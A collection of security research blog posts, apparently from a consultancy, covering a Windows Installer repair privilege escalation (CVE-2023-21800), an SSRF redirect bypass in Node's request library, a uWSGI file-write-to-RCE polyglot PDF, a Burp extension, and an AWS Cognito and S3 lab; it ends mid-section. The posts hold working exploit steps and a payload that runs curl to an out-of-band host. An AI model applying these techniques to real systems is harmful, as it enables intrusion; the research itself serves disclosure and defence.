/fp Repairs the package if a file is missing.
/fo Repairs the package if a file is missing, or if an older version is installed.
/fe Repairs the package if a file is missing, or if an equal or older version is installed.
/fd Repairs the package if a file is missing, or if a different version is installed.
/fc Repairs the package if a file is missing, or if the checksum does not match the calculated value.
/fa Forces all files to be reinstalled.
/fu Repairs all the required user-specific registry entries.
/fm Repairs all the required computer-specific registry entries.
/fs Repairs all existing shortcuts.
/fv Runs from source and re-caches the local package.

Most of the msiexec actions will require elevation. We cannot install or uninstall arbitrary packages (unless, of course, the system is badly misconfigured). However, the repair option might be an interesting exception! It might be, because not every package will work like this, but it's not hard to find one that will. For these, msiexec will auto-elevate to perform the necessary actions as the SYSTEM user. Interestingly enough, some actions will still be performed using our unprivileged account, making the case even more noteworthy.

The impersonation of our account will happen for various security reasons. Only some actions can be impersonated, though. If you’re seeing a file renamed by the SYSTEM user, it’s always going to be a fully privileged action. On the other hand, when analyzing who exactly writes to a given file, we need to look at how the file handle was opened in the first place.

We can use tools such as Process Monitor to observe all these events. To filter out the noise, I would recommend using the settings shown below. It's possible to miss something interesting, e.g., a child process's actions, but it's unrealistic to dig into every single event at once. Also, I'm intentionally disabling registry activity tracking, but occasionally it's worth re-enabling this to see if certain actions aren't controlled by editable registry keys.

Procmon filter settings

Another trick I’d recommend is to highlight the distinction between impersonated and non-impersonated operations. I prefer to highlight anything that isn’t explicitly impersonated, but you may prefer to reverse the logic.

Procmon highlighting settings

Then, to start analyzing the events of the aforementioned Google Chrome installer, one could run the following command:

msiexec.exe /fa '{B460110D-ACBF-34F1-883C-CC985072AF9E}'

The stream of events should be captured by ProcMon but to look for issues, we need to understand what can be considered an issue. In short, any action on a securable object that we can somehow modify is interesting. SYSTEM writes a file we control? That’s our target.

Typically, we cannot directly control the affected path. However, we can replace the original file with a symlink. Regular symlinks are likely not available for unprivileged users, but we may use some tricks and tools to reinvent the functionality on Windows.

Windows EoP primitives

Although we’re not trying to pop a shell out of every located vulnerability, it’s interesting to educate the readers on what would be possible given some of the Elevation of Privilege primitives.

With an arbitrary file creation vulnerability we could attack the system by creating a DLL that one of the system processes would load. It’s slightly harder, but not impossible, to locate a Windows process that loads our planted DLL without rebooting the entire system.

Having an arbitrary file creation vulnerability but with no control over the content, our chances to pop a shell are drastically reduced. We can still make Windows inoperable, though.

With an arbitrary file delete vulnerability we can at least break the operating system. Often though, we can also turn this into an arbitrary folder delete and use the sophisticated method discovered by Abdelhamid Naceri to actually pop a shell.

The list of possible primitives is long and fascinating. A single EoP primitive should be treated as a serious security issue, nevertheless.

One vulnerability to rule them all (CVE-2023-21800)

I’ve observed the same interesting behavior in numerous tested MSI packages. The packages were created by different MSI creators using different types of resources and basically had nothing in common. Yet, they were all following the same pattern. Namely, the environment variables set by the unprivileged user were also used in the context of the SYSTEM user invoked by the repair operation.

Although I initially thought that the applications were incorrectly trusting some environment variables, it turned out that the Windows Installer’s rollback mechanism was responsible for the insecure actions.

7-zip

7-Zip provides dedicated Windows Installers which are published on the project page. The following file was tested:

Filename Version
7z2201-x64.msi 22.01

To better understand the problem, we can study the source code of the application. The installer, defined in the DOC/7zip.wxs file, refers to the ProgramMenuFolder identifier.

     <Directory Id="ProgramMenuFolder" Name="PMenu" LongName="Programs">
        <Directory Id="PMenu" Name="7zip" LongName="7-Zip" />
      </Directory>
      ...
     <Component Id="Help" Guid="$(var.CompHelp)">
        <File Id="_7zip.chm" Name="7-zip.chm" DiskId="1" >
            <Shortcut Id="startmenuHelpShortcut" Directory="PMenu" Name="7zipHelp" LongName="7-Zip Help" />
        </File>
     </Component>

The ProgramMenuFolder is later used to store some components, such as a shortcut to the 7-zip.chm file.

As stated on the MSDN page:

The installer sets the ProgramMenuFolder property to the full path of the Program Menu folder for the current user. If an "All Users" profile exists and the ALLUSERS property is set, then this property is set to the folder in the "All Users" profile.

In other words, the property will either point to the directory controlled by the current user (in %APPDATA%, as in the previous example), or to the directory associated with the "All Users" profile.

While the first configuration does not require additional explanation, the second configuration is tricky. The C:\ProgramData\Microsoft\Windows\Start Menu\Programs path is typically used while C:\ProgramData is writable even by unprivileged users. The C:\ProgramData\Microsoft path is properly locked down. This leaves us with a secure default.

However, the user invoking the repair process may intentionally modify (i.e., poison) the PROGRAMDATA environment variable and thus redirect the "All Users" profile to an arbitrary location which is writable by the user. The setx command can be used for that, as shown below. It modifies variables associated with the current user, but it's important to emphasize that only future sessions are affected. A completely new cmd.exe instance should be started to inherit the new settings.
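
For example, to poison the variable with the attacker-controlled path used later in this post:

setx PROGRAMDATA C:\FakeProgramData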

Instead of placing legitimate files, a symlink to an arbitrary file can be placed in the %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\7-zip\ directory as one of the expected files. As a result, the repair operation will:

  • Remove the arbitrary file (using the SYSTEM privileges)
  • Attempt to restore the original file (using an unprivileged user account)

The second action will fail, resulting in an Arbitrary File Delete primitive. This can be observed in the following capture, assuming we're targeting the previously created C:\Windows\System32\__doyensec.txt file. We intentionally created a symlink to the targeted file under the C:\FakeProgramData\Microsoft\Windows\Start Menu\Programs\7-zip\7-Zip Help.lnk path.

The operation results in REPARSE

Firstly, we can see the actions resulting in the REPARSE status. The file is briefly processed (or rather its attributes are), and SetRenameInformationFile is called on it. The rename part is slightly misleading. What is actually happening is that the file is moved to a different location. This is how the Windows Installer creates rollback instructions in case something goes wrong. As stated before, SetRenameInformationFile doesn't work on the file handle level and cannot be impersonated. This action runs with full SYSTEM privileges.

Later on, we can spot attempts to restore the original file, but using an impersonated token. These actions result in ACCESS DENIED errors, therefore the targeted file remains deleted.

The operation results in REPARSE

The same sequence was observed in numerous other installers. For instance, I worked with PuTTY's maintainer on a possible workaround, which was introduced in the 0.78 version. In that version, the elevated repair is allowed only if administrator credentials are provided. However, this isn't functionally equivalent and has introduced some other issues. The 0.79 release should restore the old WiX configuration.

Redirection Guard

The issue was reported directly to Microsoft with all the above information and a dedicated exploit. Microsoft assigned CVE-2023-21800 identifier to it.

It was reproducible on the latest versions of Windows 10 and Windows 11. However, it was not bounty-eligible as the attack was already mitigated on the Windows 11 Developer Preview. The same mitigation has been enabled with the 2023-02-14 update.

In October 2022 Microsoft shipped a new feature called Redirection Guard on Windows 10 and Windows 11. The update introduced a new type of mitigation called ProcessRedirectionTrustPolicy and the corresponding PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY structure. If the mitigation is enabled for a given process, all processed junctions are additionally verified. The verification first checks if the filesystem junction was created by non-admin users and, if so, if the policy prevents following them. If the operation is prevented, the error 0xC00004BC is returned. The junctions created by admin users are explicitly allowed as having a higher trust-level label.

In the initial round, Redirection Guard was enabled for the print service. The 2023-02-14 update enabled the same mitigation on the msiexec process.

This can be observed in the following ProcMon capture:

The 0xC00004BC error returned by the new mitigation

msiexec is one of only a few applications that have this mitigation enforced by default. To check for yourself, use the following not-so-great code:

#include <windows.h>
#include <TlHelp32.h>
#include <cstdio>
#include <string>
#include <vector>
#include <memory>

using AutoHandle = std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)>;
using Proc = std::pair<std::wstring, AutoHandle>;

std::vector<Proc> getRunningProcesses() {
    std::vector<Proc> processes;

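    // Take a snapshot of all running processes; the unique_ptr closes the handle automatically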
    std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)> snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    Process32First(snapshot.get(), &pe32);

    do {
        auto h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
        if (h) {
            processes.emplace_back(std::wstring(pe32.szExeFile), AutoHandle(h, &CloseHandle));
        }
    } while (Process32Next(snapshot.get(), &pe32));

    return processes;
}

int main() {
    auto runningProcesses = getRunningProcesses();

    PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY policy;

    for (auto& process : runningProcesses) {
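        // Query the Redirection Trust policy; processes without the mitigation report zeroed flags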
        auto result = GetProcessMitigationPolicy(process.second.get(), ProcessRedirectionTrustPolicy, &policy, sizeof(policy));

        if (result && (policy.AuditRedirectionTrust | policy.EnforceRedirectionTrust | policy.Flags)) {
            printf("%ws:\n", process.first.c_str());
            printf("\tAuditRedirectionTrust: % d\n\tEnforceRedirectionTrust : % d\n\tFlags : % d\n", policy.AuditRedirectionTrust, policy.EnforceRedirectionTrust, policy.Flags);
        }
    }
}

The Redirection Guard should prevent an entire class of junction attacks and might significantly complicate local privilege escalation attacks. Besides the issue described here, it also mitigates other types of installer bugs, such as a privileged installer moving files from user-controlled directories.

Microsoft Disclosure Timeline

Status Date
Vulnerability reported to Microsoft 9 Oct 2022
Vulnerability accepted 4 Nov 2022
Patch developed 10 Jan 2023
Patch released 14 Feb 2023

SSRF Cross Protocol Redirect Bypass

Server Side Request Forgery (SSRF) is a fairly well-known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I bypassed a filter that we had recommended ourselves! I couldn't let it slip and had to get to the bottom of the issue.

Introduction

Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.

Request Library Vulnerability

SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.

None of the above is new, of course. All of these techniques have been around for years, and any reputable anti-SSRF library mitigates such risks. And yet, I bypassed it.

The client's code was a simple endpoint created for an integration. During the original engagement there was no filtering at all. After our test, the client applied the anti-SSRF library ssrf-req-filter. For research and code anonymity purposes, I have extracted the logic into a standalone NodeJS script:

const request = require('request');
const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];
console.log("Testing", url);

request({
    uri: url,
    agent: ssrfFilter(url),
}, function (error, response, body) {
    console.error('error:', error);
    console.log('statusCode:', response && response.statusCode);
});

To verify the redirect bypass, I created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:

<?php header('Location: '.$_GET["target"]); ?>

Initial test demonstrates that the vulnerability is fixed:

$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test" 
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.

But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:

$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200

What happened? The attacker's server redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.

Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js file:

// handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
  delete request.agent
}

According to the code above, anytime the redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server would cause a cross-protocol redirect. This is needed since the native NodeJs http(s).agent cannot be used with both protocols.

Unfortunately, such behavior also loses any event handling associated with the agent. Given that the SSRF prevention is based on the agent's createConnection event handler, this unexpected behavior affects the effectiveness of SSRF mitigation strategies in the request library.

Disclosure

This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-day mark, we decided to publish the full technical details, as well as a public GitHub issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID was assigned to this vulnerability.

  • 12/05/2022 - First disclosure to the maintainer
  • 01/18/2023 - Another attempt to contact the maintainer
  • 03/08/2023 - GitHub issue created, without the technical details
  • 03/13/2023 - CVE-2023-28155 assigned
  • 03/16/2023 - Full technical details disclosure

Other Libraries

Since a supposedly universal filter turned out to be so dependent on the implementation of the underlying HTTP(S) client, it is natural to ask how other popular libraries handle these cases.

Node-Fetch

The node-fetch library also allows overwriting the HTTP(S) agent within its options, without specifying the protocol:

const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];
console.log("Testing", url);

fetch(url, {
    agent: ssrfFilter(url)
}).then((response) => {
    console.log('Success');
}).catch(error => {
    console.log(`${error.toString().split('\n')[0]}`);
});

Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:

$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"

It is therefore impossible to perform a similar attack on this library.

Axios

The axios library’s options allow overwriting the agents for both protocols separately. Therefore, the following code is protected:

axios.get(url, {
    httpAgent: ssrfFilter("http://domain"),
    httpsAgent: ssrfFilter("https://domain")
})

Note: In the axios library, it is necessary to hardcode the URLs during the agent overwrite. Otherwise, one of the agents would be overwritten with an agent for the wrong protocol, and the cross-protocol redirect would fail similarly to the node-fetch library.

Still, axios calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:

axios.get(url, {
    // httpAgent: ssrfFilter(url),
    httpsAgent: ssrfFilter(url)
})

Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:

rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
        - pattern-either:
            - pattern: |
                {..., httpsAgent:..., ...}
            - pattern: |
                {..., httpAgent:..., ...}
        - pattern-not: |
                {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING
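
Assuming the rule above is saved as axios-only-one-agent-set.yaml, it can be run against a codebase as follows:

$ semgrep --config axios-only-one-agent-set.yaml path/to/project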

Summary

As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, it is still used as a dependency by over 50k projects, with over 18M downloads per week.

We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g., HTTPS to HTTP). While many of the libraries we reviewed did provide protection from such attacks, others such as axios could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.

A New Vector For “Dirty” Arbitrary File Write to RCE


Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

  • Control of the full file path or of the file name only: In this scenario, the attacker has the ability to control the full file path or the name of the uploaded file, but not its contents. Depending on the permissions applied to the target directory and on the target application, the impact may vary from Denial of Service to interfering with the application logic to bypass potential security-sensitive features.
  • Control of the file contents only: an attacker has control over the contents of the uploaded file but not over the file path. The impact can vary greatly in this case, due to numerous factors.
  • Full Arbitrary File Write: an attacker has control over both of the above. This often results in RCE using various methods.

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

  • Overwriting or adding files that will be processed by the application server:
    • Configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
    • Source files being served from the root of the application (e.g., .php, .asp, .jsp files)
    • Temp files
    • Secrets or environmental files (e.g., venv)
    • Serialized session files
  • Manipulating procfs to execute arbitrary code
  • Overwriting or adding files used or invoked by the OS, or by other daemons in the system:
    • Crontab routines
    • Bash scripts
    • .bashrc, .bash-profile and .profile
    • authorized_keys and authorized_keys2 - to gain SSH access
    • Abusing supervisors’ eager reloading of assets

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (β€œdirty write”) or when server-side transformations are performed on its contents.

An example of a β€œdirty” arbitrary file write

In our scenario, the application had a vulnerable endpoint through which an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

  1. Reading an existing PDF template file and its stream
  2. Combining the PDF template and the new attacker-provided contents
  3. Saving the results in a PDF file named by the attacker

The attack was limited, since it could only impact files writable by the application user, and all of the application files were read-only. While an attacker could already use the vulnerability to delete logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:

    drwxrwxr-x  6 root   root     4096 Nov 18 13:48 .
    -rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

uWSGI Lax Parsing of Configuration Files

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, including loading configuration files via simple disk files (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128. The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):

	while (len) {
		ini_line = ini_get_line(ini, len);
		if (ini_line == NULL) {
			break;
		}
		lines++;

		// skip empty line
		key = ini_lstrip(ini);
		ini_rstrip(key);
		if (key[0] != 0) {
			if (key[0] == '[') {
				section = key + 1;
				section[strlen(section) - 1] = 0;
			}
			else if (key[0] == ';' || key[0] == '#') {
				// this is a comment
			}
			else {
				// val is always valid, but (obviously) can be ignored
				val = ini_get_key(key);

				if (!strcmp(section, section_asked)) {
					got_section = 1;
					ini_rstrip(key);
					val = ini_lstrip(val);
					ini_rstrip(val);
					add_exported_option((char *) key, val, 0);
				}
			}
		}

		len -= (ini_line - ini);
		ini += (ini_line - ini);

	}

More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

    [uwsgi]
    ; read from a symbol
    foo = @(sym://uwsgi_funny_function)
    ; read from binary appended data
    bar = @(data://0)
    ; read from http
    test = @(http://doyensec.com/hello)
    ; read from a file descriptor
    content = @(fd://3)
    ; read from a process stdout
    body = @(exec://whoami)
    ; call a function returning a char *
    characters = @(call://uwsgi_func)

uWSGI Auto Reload Configuration

While abusing the above .ini files is a good vector, an attacker would still need a way to reload the configuration (such as triggering a restart of the service via a second DoS bug, or waiting for the server to restart). To help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, which causes the Python modules to be monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

    [uwsgi]
    home = /app
    uid = webapp
    gid = webapp
    chdir = /app/console
    socket = 127.0.0.1:8001
    wsgi-file = /app/console/uwsgi-sockets.py
    gevent = 500
    logto = /var/log/uwsgi/%n.log
    harakiri = 30
    vacuum = True
    py-auto-reload = 3
    callable = app
    pidfile = /var/run/uwsgi-sockets-console.pid
    log-maxsize = 100000000
    log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.
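
As a rough sketch, assuming the attacker can already write to arbitrary paths owned by the application user, the reload can be forced by touching any monitored module:

# Any write to a monitored .py module makes uWSGI reload its workers,
# re-parsing the (now attacker-controlled) .ini configuration
echo '# trigger reload' >> /app/console/uwsgi-sockets.py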

Putting it all together

In our PDF-exporting scenario, we had to craft a polyglot: a syntactically valid PDF file containing our valid, multi-line .ini configuration. The .ini payload had to survive the merging with the PDF template. We were able to embed the multi-line .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

    from fpdf import FPDF
    from exiftool import ExifToolHelper

    with ExifToolHelper() as et:
        et.set_tags(
            ["doyensec.jpg"],
            tags={"model": "&#x0a;[uwsgi]&#x0a;foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#x0a;"},
            params=["-E", "-overwrite_original"]
        )

    class MyFPDF(FPDF):
        pass

    pdf = MyFPDF()

    pdf.add_page()
    pdf.image('./doyensec.jpg')
    pdf.output('payload.pdf', 'F')

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

    uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

  1. Upload payload.pdf into /app/console/uwsgi-sockets.ini
  2. Wait for server to restart or force the uWSGI reload by overwriting any .py
  3. Verify the callback made by curl on Burp collaborator

Conclusions

As highlighted in this article, we introduced a new uWSGI-based technique, which comes in addition to the tactics already used by attackers in various scenarios to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques constantly evolve along with server technologies, and new methods will surely be popularized in the future. This is why it is important to share known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular ones.

Introducing Proxy Enriched Sequence Diagrams (PESD)

PESD Exporter is now public!

We are releasing an internal tool to speed-up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on GitHub.


Modern web platform design involves integrations with other applications and cloud services to add functionality, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.

In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.

We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).

Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.

Meet The Format

A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.

While classic sequence diagrams for software engineering are meant for abstract visualization, with all the information carried by the diagram itself, PESD is designed to include granular information about the underlying HTTP traffic being represented, in the form of metadata.

The Enriched part of the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access specific information in the metadata.

As an example, URL query parameters will be found in the arrow events as UrlParams expandable with a click.
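
For illustration only, a hand-written MermaidJS snippet in the spirit of a PESD export could look like the following (actors, messages and flags are hypothetical, not an actual export):

sequenceDiagram
    autonumber
    participant B as Browser
    participant A as app.example.com
    participant I as idp.example.com
    B->>A: GET /login [UrlParams]
    A-->>B: 302 Redirect to IdP [Cookies]
    B->>I: GET /authorize [UrlParams]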


Some key characteristics of the format:

  • visual-analysis, especially useful for complex application flows in multi-actor scenarios where the listed proxy-view is not suited to visualize the abstract logic
  • tester-specific syntax to facilitate the analysis and overall readability
  • parsed metadata from the web traffic to enable further automation of the analysis
  • usable for reporting purposes like documentation of current implementations or Proof Of Concept diagrams

PESD Exporter - Burp Suite Extension

The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.


Once loaded, sending items to the extension will directly result in an export with all the active settings.

Currently, two modes of operation are supported:

  • Domains as Actors - Each domain involved in the traffic is represented as an actor in the diagram. Suitable for multi-domain flows analysis

  • Endpoints as Actors - Each endpoint (path) involved in the traffic is represented as an actor in the diagram. Suitable for single-domain flows analysis


Export Capabilities

  • Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover

  • Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable names <UUID_N> / <VAR_N>. The re-rendering will reshape the diagram to improve flow readability. Every occurrence with the same value maintains the same name

  • Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports

  • Save as:

    • Sequence Diagram in SVG format
    • Markdown file (MermaidJS syntax),
    • Traffic metadata in JSON format. Read about the metadata structure in the format definition page, “exports section”

Extending the diagram, syntax and metadata with Templates

PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:

  • OAuth2 / OpenID Connect - The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame

  • SAML SSO - The template matches Single Sign-On flows with SAML V2.0 and adds related flags + flow frame

Template matching example for SAML SP-initiated SSO with redirect POST:


The template engine also ensures consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames, since they cannot be found in real-world scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS rendering.

Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.

Do you want to contribute by writing your own templates? Follow the template implementation guide.

Why PESD?

During Test Planning and Auditing

PESD exports allow visualizing complex functionalities in their entirety, while still being able to access the core parts of the underlying logic. The role of each actor can be easily derived and used to build a test plan before diving into Burp Suite.

It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.

In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted at a glance.

The following detailed examples are extracted from our testing activities:

  • SAML Response Double Spending. The SAML Response was sent twice, and one of the submissions happened outside of the flow frame

  • OIDC with subsequent OAuth2. In this case, CLIENT.com was the SP in the first flow with Microsoft (OIDC), then it was the IdP in the second flow (OAuth2) with the tenant subdomain.


During Reporting

The major benefit of this research output is the combination of the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports allows describing the issue in a straightforward way.

The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:

  • Black Box Testing - The description can refer to the interested sequence numbers in the flow along with the observed behavior and flaws;

  • White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.

In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.

The following basic example is extracted from one of our client engagements.

Report Example - Arbitrary User Access Via Unauthenticated Internal API Endpoint

An internal (Intranet) web application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web-facing platform.

In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations via a valid grant.

The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:


The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.

The second request (3) pointed to AWS’s API Gateway. The endpoint was handled by an AWS Lambda function taking as input the URL parameters containing: tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.

In the third request (5), the authentication details obtained are submitted to the web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.

Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).

As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web-facing platform. By doing so, both the need for valid super-admin access to the internal application (authentication) and for a specific target-user access grant (authorization) were bypassed.

Stay tuned!

Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.

Feel free to contribute with pull requests, bug reports or enhancements.

This project was made with love in the Doyensec Research island by Francesco Lacerenza. The extension was developed during his internship with 50% research time.

Tampering User Attributes In AWS Cognito User Pools

CloudsecTidbit

From The Previous Episode… Did you solve the CloudSecTidbit Ep. 1 IaC lab?

Solution

The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.

The name of the bucket is returned to the client by calling the /variable endpoint:

$.ajax({
    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    },
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");
    }
});

The server will return something like:

"data-internal-private-20220705153355922300000001"

So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:

Extracting data from the internal S3 bucket

Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.

Tidbit No. 2 - Tampering User Attributes In AWS Cognito User Pools

Amazon Web Services offers a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.

From AWS Cognito’s welcome page:

“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”

Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.

Pool Types

The two main components of Amazon Cognito are:

  • User pools: Provide sign-up and sign-in options for app users along with attributes association for each user.
  • Identity pools: Provide the possibility to grant users access to other AWS services (e.g., DynamoDB or Amazon S3).

With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.

Each user has a profile that applications can access through the software development kit (SDK).

User Attributes

